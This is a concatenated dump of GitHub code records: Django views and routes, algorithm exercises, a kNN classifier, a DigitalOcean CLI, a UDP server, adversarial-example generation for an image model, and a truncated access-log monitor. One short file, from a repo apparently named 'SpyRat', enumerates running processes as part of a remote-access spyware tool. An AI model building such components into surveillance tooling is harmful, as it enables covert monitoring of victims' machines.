devices\n","repo_name":"y-du/senergy-connector","sub_path":"iot/device_manager.py","file_name":"device_manager.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"16369833571","text":"# Import modules\n\nimport subprocess\n\n\n# Gets a list of active processes\n\ndef ProcessList():\n\tCalling = subprocess.Popen('tasklist',\n\t\tshell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.readlines()\n\tProcess = [Calling[i].decode('cp866', 'ignore').split()[0].split('.exe')[0] for i in range(3,len(Calling))]\n\tProcesses = '\\n'.join(Process)\n\treturn Processes","repo_name":"sympact06/SpyRat","sub_path":"Core/Files/Tasklist.py","file_name":"Tasklist.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"21622515867","text":"from django.urls import path, include\nfrom rest_framework import routers\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register('categories', views.CategoryView)\nrouter.register('books', views.BookView)\nrouter.register('members', views.MemberView)\n\nurlpatterns = [\n path('', include(router.urls))\n]\n","repo_name":"rosenkrans/library-app","sub_path":"library_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37567926651","text":"def main():\n while True:\n try:\n n = int(input())\n except EOFError:\n break\n x, y = 0, 0\n for _ in range(n):\n arr = input().split()\n m, d = int(arr[0]), int(arr[1])\n if(m == 0): y += d\n if(m == 1): x += d\n if(m == 2): y -= d\n if(m == 3): x -= d\n print(x,y)\nmain()","repo_name":"InfiniteWing/Solves","sub_path":"zerojudge.tw/c314.py","file_name":"c314.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29623686797","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\ndata = np.genfromtxt(\"./data/fishers.txt\", dtype = None, delimiter = \"\\t\") # ファイルか���読み込み\nprint(data)\nnumber = 149\npercent = [0 for i in range(30)]\n\nfor k in range(1, 31):\n counter = 0\n for i in range(number):\n length = [[0 for col in range(2)] for row in range(149)]\n for j in range(number): # 各点との距離をはかり、データの順番とともに配列に入れる\n length1 = data[i][0] - data[j][0]\n length2 = data[i][1] - data[j][1]\n length3 = data[i][2] - data[j][2]\n length4 = data[i][3] - data[j][3]\n length[j][0] = j\n length[j][1] = np.sqrt(length1**2 + length2**2 + length3**2 + length4**2)\n \n length.sort(key = lambda x:x[1]) # 距離の順に並べ替え\n seto = ver = vir = 0\n for n in range(2, k+2): # 近くにあるk個のデータについて、ラベルの数を数える。最も近いのは自分自身なので除外\n p = length[n][0]\n if data[p][4] == b'I. setosa':\n seto += 1\n elif data[p][4] == b'I. versicolor':\n ver += 1\n elif data[p][4] == b'I. virginica':\n vir += 1\n \n if seto >= ver and seto >= vir: # 最大個数のものとi番目のラベルが一致すればcounterを増やす\n if data[i][4] == b'I. setosa':\n counter += 1\n elif ver > seto and ver >= vir:\n if data[i][4] == b'I. versicolor':\n counter += 1\n elif vir > seto and vir > ver:\n if data[i][4] == b'I. virginica':\n counter += 1\n\n percent[k-1] = 100*float(counter)/(number-1) # 各iについてcounterを足し、正答率を出す\n\nprint(percent)\n\n# グラフに表示\nxaxis = [i for i in range(1,31)] \nplt.plot(xaxis, percent, color = \"red\")\nplt.title(\"k-NN (k = 1~30)\")\nplt.xlabel(\"k\")\nplt.ylabel(\"rate of correct answer(%)\")\nplt.savefig('./result/knn_result.png')\n# plt.show()\n","repo_name":"shutakahama/Pattern_Recognition_basic","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37499151446","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def increasingBST(self, root: TreeNode) -> TreeNode:\n global roots\n roots = root\n global first\n global joiner\n joiner = None\n first = 1\n\n def helper(nde):\n global first\n global roots\n global joiner\n if nde.left:\n helper(nde.left)\n if first:\n roots = nde\n joiner = nde\n first = 0\n else:\n nde.left = None\n joiner.right = nde\n joiner = nde\n if nde.right:\n helper(nde.right)\n\n helper(roots)\n return roots\n","repo_name":"kaivalyakate/Leetcode---Interview-Preparation","sub_path":"dec_leetcode/inorderbst.py","file_name":"inorderbst.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1341376566","text":"from django.shortcuts import render,redirect\nfrom .models import Edubridge\nfrom .forms import EdubridgeForm\nfrom django.contrib import messages\nfrom django.db.models import Q\n\ndef eform(request):\n form=EdubridgeForm()\n if request.method=='POST':\n form=EdubridgeForm(request.POST,request.FILES)\n if form.is_valid():\n form.save()\n return redirect(\"eall\")\n\n return redirect(\"hello\")\n else:\n form=EdubridgeForm()\n return render(request,\"eform.html\",{\"form\":form})\n\ndef eall(request):\n data=Edubridge.objects.all()\n query=request.GET.get('s')\n print(query)\n if query is not None:\n data=data.filter(Q(learners_name__icontains=query)|\n Q(adress__icontains=query))\n messages.info(request,\"YOUR INFORMATION BASED ON YOUR INPUT\")\n\n return render(request,\"eall.html\",{\"data\":data})\n #data=data.filter(Q(learners_name__icontains=query) |\n # Q(adress__icontains=query)\n #)\n\n\n\n\ndef hello(request):\n return render(request,\"query.html\")# Create your views here.\ndef eformget(request,a):\n a=Edubridge.objects.get(id=a)\n return render(request,\"eformget.html\",{\"a\":a})\ndef eformupdate(request,a):\n a=Edubridge.objects.get(id=a)\n form=EdubridgeForm()\n if request.method=='POST':\n form=EdubridgeForm(request.POST,request.FILES,instance=a)\n if form.is_valid():\n form.save()\n return redirect(\"eall\")\n else:\n return redirect(\"hello\")\n else:\n form=EdubridgeForm()\n return render(request,'eformupdate.html',{'form':form,'a':a})\ndef eformdelete(request,t):\n a=Edubridge.objects.get(id=t)\n a.delete()\n return redirect('eall')\n","repo_name":"aparnatirumalasetti/demat","sub_path":"app6/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7806673133","text":"'''\n\nProblem Statement: Exam Score Analysis and Visualization\nAn exam has been conducted for a class of students. The exam data is stored in a CSV file,\ncontaining the student names and their scores. Develop a Python program to analyse the exam\nscores, calculate key statistics, and visualize the data to gain insights into the students'\nperformance.\n\n'''\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv(\"exam_scores.csv\")\nmean_score = data['Score'].mean()\nmedian_score = data['Score'].median()\nstd_dev = data['Score'].std()\n\nprint(f\"Mean Score: {mean_score:.2f}\")\nprint(f\"Median Score: {median_score:.2f}\")\nprint(f\"Standard Deviation: {std_dev:.2f}\")\n\n# Histogram\nplt.hist(data['Score'], bins=10, edgecolor='black')\nplt.title(\"Exam Score Distribution\")\nplt.xlabel(\"Score\")\nplt.ylabel(\"Frequency\")\nplt.show()\n\n# Box plot\nplt.boxplot(data['Score'])\nplt.title(\"Exam Score Distribution\")\nplt.ylabel(\"Score\")\nplt.show()\n\n\n","repo_name":"9147/PythonClassWork","sub_path":"Term work/tw8/tw8.py","file_name":"tw8.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"23842960227","text":"import argparse\nfrom six.moves import map # pylint: disable=redefined-builtin\nfrom . import _util as util\nfrom ..image import Image\n\ndef main(argv=None, parsed=None):\n parser = argparse.ArgumentParser(parents=[util.universal],\n prog='doapi-image',\n description='Manage DigitalOcean droplet'\n ' images')\n cmds = parser.add_subparsers(title='command', dest='cmd')\n\n cmd_show = cmds.add_parser('show', help='List images',\n description='List images')\n showopts = cmd_show.add_mutually_exclusive_group()\n showopts.add_argument('--distribution', action='store_const',\n dest='type', const='distribution',\n help='List distribution images')\n showopts.add_argument('--application', action='store_const',\n dest='type', const='application',\n help='List application images')\n showopts.add_argument('--type',\n help='List all images of the given type'\n ' (usually \"distribution\" or \"application\")')\n showopts.add_argument('--private', action='store_true',\n help=\"List all of the user's private images\")\n cmd_show.add_argument('-M', '--multiple', action='store_true',\n help='Show multiple images with the same ID, slug, or'\n ' name')\n cmd_show.add_argument('image', nargs='*',\n help='ID, slug, or name of an image; omit to list all')\n\n cmd_delete = cmds.add_parser('delete', help='Delete an image',\n description='Delete an image')\n cmd_delete.add_argument('-M', '--multiple', action='store_true',\n help='Delete multiple images with the same ID,'\n ' slug, or name')\n cmd_delete.add_argument('image', nargs='+',\n help='ID, slug, or name of an image')\n\n cmd_update = cmds.add_parser('update', help='Rename an image',\n description='Rename an image')\n cmd_update.add_argument('--unique', action='store_true',\n help='Error if the new name is already in use')\n cmd_update.add_argument('image', help='ID, slug, or name of an image')\n cmd_update.add_argument('name', help='new name for the image')\n\n cmd_transfer = cmds.add_parser('transfer', parents=[util.waitopts],\n help='Transfer images to another region',\n description='Transfer images to another region')\n cmd_transfer.add_argument('-M', '--multiple', action='store_true',\n help='Transfer multiple images with the same ID,'\n ' slug, or name')\n cmd_transfer.add_argument('region',\n help='slug of the region to transfer images to')\n cmd_transfer.add_argument('image', nargs='+',\n help='ID, slug, or name of an image')\n\n cmd_convert = cmds.add_parser('convert', parents=[util.waitopts],\n help='Convert images to snapshots',\n description='Convert images to snapshots')\n cmd_convert.add_argument('-M', '--multiple', action='store_true',\n help='Convert multiple images with the same ID,'\n ' slug, or name')\n cmd_convert.add_argument('image', nargs='+',\n help='ID, slug, or name of an image')\n\n util.add_actioncmds(cmds, 'image')\n\n args = parser.parse_args(argv, parsed)\n client, cache = util.mkclient(args)\n\n if args.cmd == 'show':\n if args.type is not None:\n if args.image:\n util.die('--type and image arguments are mutually exclusive')\n util.dump(client.fetch_all_images(type=args.type))\n elif args.private:\n if args.image:\n util.die('--private and image arguments are mutually exclusive')\n util.dump(client.fetch_all_private_images())\n elif args.image:\n util.dump(cache.get_images(args.image, multiple=args.multiple))\n else:\n util.dump(client.fetch_all_images())\n\n elif args.cmd == 'delete':\n imgs = cache.get_images(args.image, multiple=args.multiple)\n for i in imgs:\n i.delete()\n\n elif args.cmd == 'update':\n cache.check_name_dup(\"image\", args.name, args.unique)\n img = cache.get_image(args.image, multiple=False)\n util.dump(img.update_image(args.name))\n\n elif args.cmd == 'transfer':\n imgs = cache.get_images(args.image, multiple=args.multiple)\n acts = (i.transfer(args.region) for i in imgs)\n if args.wait:\n acts = util.catch_timeout(client.wait_actions(acts))\n util.dump(acts)\n\n elif args.cmd == 'convert':\n imgs = cache.get_images(args.image, multiple=args.multiple)\n acts = map(Image.convert, imgs)\n if args.wait:\n acts = util.catch_timeout(client.wait_actions(acts))\n util.dump(acts)\n\n elif args.cmd in ('act', 'actions', 'wait'):\n imgs = cache.get_images(args.image, multiple=args.multiple)\n util.do_actioncmd(args, client, imgs)\n\n else:\n assert False, 'No path defined for command {0!r}'.format(args.cmd)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jwodder/doapi","sub_path":"doapi/cli/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"34297505304","text":"# -*- coding: utf-8 -*-\n\"\"\"Module that checks the user-input values make sense for each variable. \n\nCreated on Mon Mar 30 12:36:50 2020\n\n@author: tbeleyur\n\"\"\"\nimport os \n\ndef make_sure_its_positive(value, **kwargs):\n '''\n\n Parameters\n ----------\n value : float/int\n The variable value tobe checked\n variable: str, optional\n Name of the variabel to be checkeds\n\n Raises\n ------\n ValueError\n If the variable value is <0\n\n Returns\n -------\n None.\n\n '''\n variable = kwargs.get('variable', 'this variable')\n if value <0:\n msg = f'The entered value for {variable}: {value} cannot be negative. Check entry.'\n raise ValueError(msg)\n\ndef make_sure_its_negative(value, **kwargs):\n '''\n\n Parameters\n ----------\n value : float/int\n The variable value tobe checked\n variable: str, optional\n Name of the variabel to be checkeds\n\n Raises\n ------\n ValueError\n If the variable value is >0\n\n Returns\n -------\n None.\n\n '''\n variable = kwargs.get('variable', 'this variable')\n if value >0:\n msg = f'The entered value for {variable}: {value} cannot be positive. Check entry.'\n raise ValueError(msg)\n\ndef check_preexisting_file(file_name):\n '''\n Raises\n ------\n ValueError : if the target file name already exists in the current directory\n '''\n exists = os.path.exists(file_name)\n\n if exists:\n mesg = 'The file: '+file_name+' already exists- please move it elsewhere or rename it!'\n raise ValueError(mesg)\n","repo_name":"thejasvibr/itsfm","sub_path":"itsfm/sanity_checks.py","file_name":"sanity_checks.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"35233940076","text":"import calendar\ndef number_of_days(year,month):\n \"\"\"\n Write a function that returns the number of calendar days in a given year and month. \n \"\"\"\n assert year>0\n assert type(year)==int\n assert type(month)==int\n assert 1<=month<=12\n days=calendar.monthrange(year,month)[1]\n return days\n\ndef number_of_leap_years(year1,year2):\n \"\"\"\n Write a function to find the number of leap-years between (including both endpoints) two given years. \n \"\"\"\n assert year1>0\n assert year2>0\n assert type(year1)==int\n assert type(year2)==int\n assert year2>=year1\n c=0\n for y in range(year1,year2+1):\n d=number_of_days(y,2)\n if d==29:\n c+=1\n return c\ndef get_day_of_week(year,month,day):\n \"\"\"\n Write a function to find the string name (e.g., Monday, Tuesday) \n of the day of the week on a given month,day, and year.\n \"\"\"\n assert type(year)==int\n assert year>0\n assert type(month)==int\n assert 1<=month<=12\n assert type(day)==int\n days=number_of_days(year,month)\n assert day<=days\n d=calendar.weekday(year,month,day)\n if d==0:\n return 'Monday'\n elif d==1:\n return 'Tuesday'\n elif d==2:\n return 'Wednesday'\n elif d==3:\n return 'Thursday'\n elif d==4:\n return 'Friday'\n elif d==5:\n return 'Saturday'\n elif d==6:\n return 'Sunday'\n","repo_name":"agrawal-khushboo/ECE-143","sub_path":"calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29187185947","text":"# globモジュールのglob()関数を使用\r\n# globモジュールはディレクトリ内で指定した拡張子のファイルを返す\r\nimport glob\r\n\r\n# ファイル、ディレクトリのパス操作を行うためにosモジュールを使用\r\nimport os\r\n\r\n# input()関数を使用して新しいファイル名の入力\r\nenter_new_name = input(\"新しいファイル名の入力 ⇒ \")\r\n\r\n# --------------------------------------------------------------------------------------\r\n# .wav\r\n\r\n# 名前を変更するファイルを\"files\"と命名\r\nfiles = glob.glob(\"*.wav\")\r\n\r\n# enumerate()関数を使用して\"files\"にインデックス番号を設定して抽出\r\nfor i, old_name in enumerate(files):\r\n\r\n # 新しいファイル名の決定\r\n # 新しいファイル名に「_001」を始めとする番号をつけるために\"_{0:03d}\"と\"(i + 1)\"を追加\r\n new_name = enter_new_name + \"_wav_{0:03d}.wav\".format(i + 1)\r\n\r\n # ファイル名の変更\r\n os.rename(old_name, new_name)\r\n\r\n # 変更の表示\r\n print(old_name + \" ⇒ \" + new_name)\r\n\r\n# --------------------------------------------------------------------------------------\r\n# .mp3\r\n\r\nfiles = glob.glob(\"*.mp3\")\r\n\r\nfor i, old_name in enumerate(files):\r\n\r\n new_name = enter_new_name + \"_mp3_{0:03d}.mp3\".format(i + 1)\r\n\r\n os.rename(old_name, new_name)\r\n\r\n print(old_name + \" ⇒ \" + new_name)\r\n\r\n# --------------------------------------------------------------------------------------\r\n\r\n# enterキーでコマンドプロンプトを終了\r\ninput()\r\n","repo_name":"zozf/wav_mp3_change","sub_path":"wav_mp3_change.py","file_name":"wav_mp3_change.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"23138976475","text":"# Ep04 - APLICAÇÃO SERVIDORA COM UDP\r\n\r\nfrom socket import *\r\n\r\nservidor = \"127.0.0.1\" # localhost, 192.168.0.1, 10.0.0.1\r\nporta = 43210\r\n\r\nobj_socket = socket(AF_INET, SOCK_DGRAM)\r\nobj_socket.bind((servidor, porta))\r\nprint(\"Servidor pronto...\")\r\n\r\nwhile True:\r\n dados, origem = obj_socket.recvfrom(65535) # \"aplicação juiz\"\r\n\r\n print(\"Origem..............: \", origem)\r\n print(\"Dados recebidos.....: \", dados.decode()) # decodificar para string\r\n\r\n resposta = input(\"Digite a resposta: \")\r\n obj_socket.sendto(resposta.encode(), origem) # codificar para byte\r\n\r\nobj_socket.close()\r\n","repo_name":"fslaurafs/NanoCourses-FiapOn","sub_path":"Python/Python/Cap7/Protocolos de Comunicação e Python/Ep04_servidorUDP.py","file_name":"Ep04_servidorUDP.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42770959642","text":"import copy\r\nimport models\r\nimport torch\r\nimport torch.optim as optim\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport numpy as np\r\nimport visualizations\r\n\r\ndef adversarial_optimizing_noise(model, org_img, true_label, target_label, regularization=\"l1\"):\r\n \"\"\"\r\n Creates an adversarial image by optimizing some noise, and add it to some original image.\r\n :param model: the trained model we want to fool.\r\n :param org_img: original image. to it we want to add the noise in order to create the adversarial image.\r\n :param true_label: the gold label of org_image.\r\n :param target_label: the label we want the trained model will mistakly classify it for the adversarial image.\r\n :param regularization: which norm to use in order to keep the noise as low as possibale.\r\n :return: noise - the noise we should add to original image in order to create an adversarial image\r\n pred_adversarial_label - the last label the trained model predicted to the noise image\r\n in the noise optimization iterations.\r\n \"\"\"\r\n\r\n # necessary pre-processing\r\n target_label = torch.LongTensor([target_label]) #\r\n org_img = org_img.unsqueeze(0) # add batch diminsion to org_image\r\n\r\n # Init value of noise and make its gradients updatable\r\n noise = nn.Parameter(data=torch.zeros(1, 3*32*32), requires_grad=True) # gray image\r\n #noise = nn.Parameter(data=torch.ones(1, 3*32*32), requires_grad=True) # white image\r\n #noise = nn.Parameter(data=torch.randn(1, 3*32*32), requires_grad=True) # gaussion noise\r\n\r\n # Check classification before modification\r\n pred_label = np.argmax(model(org_img).data.numpy())\r\n if true_label != pred_label:\r\n print(\"WARNING: IMAGE WAS NOT CLASSIFIED CORRECTLY\")\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n optimizer = optim.SGD(params=[noise], lr=0.001, momentum=0.9)\r\n\r\n # Noise optimization\r\n iterations = 30000\r\n for iteration in range(iterations):\r\n\r\n optimizer.zero_grad()\r\n output = model(org_img + noise.view((1,3,32,32)))\r\n loss = criterion(output, target_label)\r\n\r\n if regularization == \"l1\":\r\n adv_loss = loss + torch.mean(torch.abs(noise))\r\n elif regularization == \"l2\":\r\n adv_loss = loss + torch.mean(torch.pow(noise, 2))\r\n else:\r\n adv_loss = loss\r\n\r\n adv_loss.backward()\r\n optimizer.step()\r\n\r\n # keep optimizing until we get that the predicted label is the target label\r\n pred_adversarial_label = np.argmax(model(org_img).data.numpy())\r\n if pred_adversarial_label == target_label:\r\n break\r\n\r\n if iteration == iterations-1:\r\n print(\"Warning: optimization loop ran for the maximum iterations. The result may not be correct\")\r\n\r\n return noise.view((3,32,32)).detach(), pred_adversarial_label\r\n\r\ndef FGSM(model, org_img, true_label):\r\n \"\"\"\r\n Creates an adversarial image by Fast Gradient Sign Method.\r\n :param model: the trained model.\r\n :param org_img: original image. to it we want to add the noise in order to create the adversarial image.\r\n :param true_label: the gold label of org_image.\r\n :return: adversarial_img,\r\n noise - the noise used to create the adversarial image\r\n y_pred_adversarial\r\n \"\"\"\r\n\r\n true_label = Variable(torch.LongTensor(np.array([true_label])), requires_grad=False)\r\n\r\n org_img = org_img.unsqueeze(0) # add batch diminsion\r\n org_img = Variable(org_img, requires_grad=True) # set org_img as parameter (cuz we need its gradient)\r\n\r\n # Classification before Adv\r\n pred_label = np.argmax(model(org_img).data.numpy())\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n # Forward pass\r\n output = model(org_img)\r\n loss = criterion(output, true_label)\r\n loss.backward() # obtain gradients on org_img\r\n\r\n # Add perturbation\r\n epsilon = 0.01 #0.01 # 0.15\r\n x_grad = torch.sign(org_img.grad.data)\r\n noise = epsilon * x_grad\r\n adversarial_img = torch.clamp(org_img.data + noise, 0, 1)\r\n\r\n # Classification after optimization\r\n y_pred_adversarial = np.argmax(model(Variable(adversarial_img)).data.numpy())\r\n\r\n return adversarial_img.squeeze(0), noise.squeeze(0), y_pred_adversarial\r\n\r\n\r\ndef create_adversarial_img(path, org_img, true_label):\r\n \"\"\"\r\n Creates an adversarial image, and display it. We do it with 2 different methods.\r\n :param path: a path for the trained model.\r\n :param org_img: original image. to it we want to add the noise in order to create the adversarial image.\r\n :param true_label: the gold label of org_image.\r\n \"\"\"\r\n\r\n # Load trained model\r\n trained_net = models.SimpleModel()\r\n trained_net.load(path=path)\r\n trained_net.eval()\r\n\r\n # show original image\r\n visualizations.imshow(org_img)\r\n\r\n # Adversarial method 1\r\n\r\n # Copy the model so the original trained network wont change while we creating\r\n # the adversarial image\r\n model_copy = copy.deepcopy(trained_net)\r\n model_copy.eval()\r\n\r\n noise, adv_label = adversarial_optimizing_noise(model_copy, org_img, true_label=0, target_label=2, regularization=\"l1\")\r\n\r\n visualizations.imshow(noise) # show noise\r\n visualizations.imshow(org_img+noise) # show adversarial image\r\n out = trained_net((org_img+noise).unsqueeze(0))\r\n print(\"true label:\", true_label, \"adv_label:\", adv_label, \"trained_net label:\", out)\r\n\r\n\r\n # Adversarial method 2\r\n\r\n model_copy2 = copy.deepcopy(trained_net)\r\n adver_img, noise2, adv_label_2 = FGSM(model_copy2, org_img, true_label=0)\r\n\r\n visualizations.imshow(noise2) # show noise\r\n visualizations.imshow(adver_img) # show adversarial image\r\n out = trained_net(adver_img.unsqueeze(0))\r\n print(\"true label:\", true_label, \"adv_label:\", adv_label_2, \"trained_ned label:\", out)\r\n\r\n","repo_name":"OdedMous/Imbalanced-Dataset","sub_path":"adversarial.py","file_name":"adversarial.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"3819089767","text":"import argparse\nimport csv\nimport logging\nimport time\nfrom collections import Counter, deque\nfrom typing import Generator, Optional\n\n\nclass AccessLogAggregate:\n def __init__(\n self,\n bucket_size_seconds: int,\n bucket: int,\n event: Optional[dict] = None,\n ):\n \"\"\"Create an aggregate over a time-grouping of other AccessLogAggregates\n\n An AccessLogAggregate can represent one or more log events. When it represents only one event,\n self.bucket_size_seconds is 0.\n\n :param bucket_size_seconds: The size of the time bucket represented by this aggregate\n :param bucket: The epoch timestamp of the beginning of the time bucket represented by this aggregate\n :param event: An event that, if given, initializes analysis counters for the aggregate\n \"\"\"\n self.bucket_size_seconds = bucket_size_seconds\n self.bucket = bucket\n # allow events to join this aggregate up to 30 seconds after its bucket has ended\n # accounts for out-of-order event arrival\n self.latest_time_before_close = self.bucket + self.bucket_size_seconds + 30\n self.top_sections = Counter()\n self.top_hosts = Counter()\n self.top_status_codes = Counter()\n self.availability = Counter()\n self.bytes = 0\n self.is_closed = False\n\n if event is not None:\n self.bucket_size_seconds = 0\n self.top_sections = Counter(\n [section_from_request(event.get(\"request\", \"GET / HTTP/1.0\"))]\n )\n self.top_hosts = Counter([event.get(\"remotehost\", \"foo\")])\n self.top_status_codes = Counter([event.get(\"status\", \"\")])\n self.availability = Counter(\n {\n \"total\": 1,\n \"successes\": int(event.get(\"status\") == \"200\"),\n \"failures\": int(event.get(\"status\") != \"200\"),\n }\n )\n self.bytes = int(event.get(\"bytes\", 0))\n\n def __repr__(self):\n return f\"\"\n\n def add(self, aggregate: \"AccessLogAggregate\"):\n \"\"\"Update analysis counters with information from the given aggregate\"\"\"\n # discard events for very old time windows that may appear due to out-of-order delivery\n if self.is_closed:\n logging.warning(\n \"Received event for already-closed alerting window %s\", self\n )\n return\n\n self.top_sections.update(\n {key: count for key, count in aggregate.top_sections.items()}\n )\n self.top_hosts.update(\n {key: count for key, count in aggregate.top_hosts.items()}\n )\n self.top_status_codes.update(\n {key: count for key, count in aggregate.top_status_codes.items()}\n )\n self.availability.update(aggregate.availability)\n self.bytes += aggregate.bytes\n\n def close(self):\n \"\"\"Mark this aggregate as closed and log its collected stats\"\"\"\n logging.info(\n \"Bucket=%s\\n\\tBucket size=%ss\\n\\tTop sections=%s\\n\\tTop hosts=%s\\n\\t\"\n \"Top status codes=%s\\n\\tAvailability=%s\\n\\tBytes=%s\\n\",\n self.bucket,\n self.bucket_size_seconds,\n self.top_sections,\n self.top_hosts,\n self.top_status_codes,\n self.availability,\n self.bytes,\n )\n self.is_closed = True\n\n\nclass AccessLogMonitor:\n def __init__(\n self,\n events: Generator[AccessLogAggregate, None, None],\n window_size_seconds: int,\n threshold: float,\n ):\n \"\"\"Create a monitor over AccessLogAggregates based on a sliding window\n\n :param events: The sequence of aggregates over which to perform monitoring\n :param window_size_seconds: The size of the sliding window used for analysis, in seconds\n :param threshold: The number of events per second on average over the monitoring window that will cause an alert\n to trigger\n \"\"\"\n self.window_size_seconds = 0\n self.min_window_size_seconds = window_size_seconds\n self.first_event_timestamp = 0\n self.last_event_timestamp = 0\n self.alert_threshold = threshold\n self.events = events\n self.window = []\n self.alert_triggered = False\n self.times_alert_triggered = 0\n\n def run(self):\n \"\"\"Monitor the sequence of aggregates\"\"\"\n for event in self.events:\n self.update_window(event)\n if self.window_size_seconds >= self.min_window_size_seconds:\n self.evaluate_alert_conditions(event.bucket)\n yield event\n\n def update_window(self, event: AccessLogAggregate):\n \"\"\"Add the given event to the analysis window\n\n Maintains a sliding window by expelling old events as new ones are added\n Tracks the size of the window in seconds\n \"\"\"\n # feels like this could be more efficient, but avoiding an iteration over the entire window\n # would require a guarantee that it's sorted by timestamp. possible future improvement.\n self.window = [\n e\n for e in self.window\n if e.bucket >= event.bucket - self.min_window_size_seconds\n ]\n self.window.append(event)\n self.first_event_timestamp = min(self.window[0].bucket, event.bucket)\n self.last_event_timestamp = max(self.window[-1].bucket, event.bucket)\n self.window_size_seconds = (\n self.last_event_timestamp - self.first_event_timestamp\n )\n\n # this only has one alert condition, but it would be straightforward to make it loop over multiple alert conditions\n def evaluate_alert_conditions(self, timestamp: int):\n \"\"\"Check the alert conditions and trigger alerts if applicable\n\n :param timestamp: The current time\n \"\"\"\n average_events_per_second = (\n round( # don't be quite so precise with the average calculation\n len(self.window) / (self.window_size_seconds or 1), 1\n )\n )\n if average_events_per_second > self.alert_threshold:\n self.trigger_alert(average_events_per_second, timestamp)\n return True\n else:\n self.resolve_alert(average_events_per_second, timestamp)\n return False\n\n def trigger_alert(self, average_events_per_second: float, current_time: int):\n if not self.alert_triggered:\n self.alert_triggered = True\n self.times_alert_triggered += 1\n logging.warning(\n \"High traffic generated an alert - hits = %.2f/s, triggered at %s\\n\",\n average_events_per_second,\n current_time,\n )\n logging.debug(\n \"window_size=%ss\\n\\tTotal events=%s\\n\\tavg_events_per_second=%f\\n\\t\"\n \"More than %s events per second\\n\",\n self.window_size_seconds,\n len(self.window),\n average_events_per_second,\n self.alert_threshold,\n )\n\n def resolve_alert(self, average_events_per_second: float, current_time: int):\n if self.alert_triggered:\n self.alert_triggered = False\n logging.warning(\n \"Reduced traffic resolved an alert - hits = %.2f/s, resolved at %s\\n\",\n average_events_per_second,\n current_time,\n )\n logging.debug(\n \"window_size=%ss\\n\\tTotal events=%s\\n\\tavg_events_per_second=%f\\n\\t\"\n \"Fewer than %s events per second\\n\",\n self.window_size_seconds,\n len(self.window),\n average_events_per_second,\n self.alert_threshold,\n )\n\n\ndef is_valid(event: dict[str, str]) -> bool:\n \"\"\"Return a boolean indicating whether the given event dictionary adheres to the schema this program expects\"\"\"\n if any(\n event[key] is None\n for key in (\n \"remotehost\",\n \"rfc931\",\n \"authuser\",\n \"date\",\n \"request\",\n \"status\",\n \"bytes\",\n )\n ):\n return False\n if None in event:\n return False\n return True\n\n\ndef read_access_log(\n input_file: str, timescale: float\n) -> Generator[AccessLogAggregate, None, None]:\n \"\"\"Generates AccessLogAggregates from a CSV HTTP access logfile\n\n Simulates delayed event arrival with time.sleep.\n Minimizes memory usage by lazily reading from disk.\n\n :param input_file: The relative path of the file from which to read access logs\n :param timescale: A multiplier applied to the sleep time between events. The sleep time defaults to the difference\n between the each pair of event timestamps in the log.\n \"\"\"\n current_timestamp = 0\n with open(input_file, newline=\"\") as csvfile:\n reader = csv.DictReader(csvfile, delimiter=\",\", quotechar='\"')\n for event in reader:\n if not is_valid(event):\n logging.warning(\"Malformed log entry encountered: %s\", event)\n continue\n time.sleep(\n (\n max(int(event.get(\"date\")) - current_timestamp, 0)\n if current_timestamp\n else 0\n )\n * timescale\n )\n current_timestamp = int(event.get(\"date\"))\n aggregate = AccessLogAggregate(0, current_timestamp, event)\n yield aggregate\n\n\ndef aggregate_stats(\n aggregates: Generator[AccessLogAggregate, None, None],\n bucket_size_seconds: int,\n) -> Generator:\n \"\"\"Collect and report statistics on time-bucketed aggregates over the generator\n\n This is a bare function as opposed to a class method because it doesn't have enough state to track\n to warrant the extra level of encapsulation.\n\n :param aggregates: The sequence over which to aggregate\n :param bucket_size_seconds: The size in seconds of the aggregation buckets to 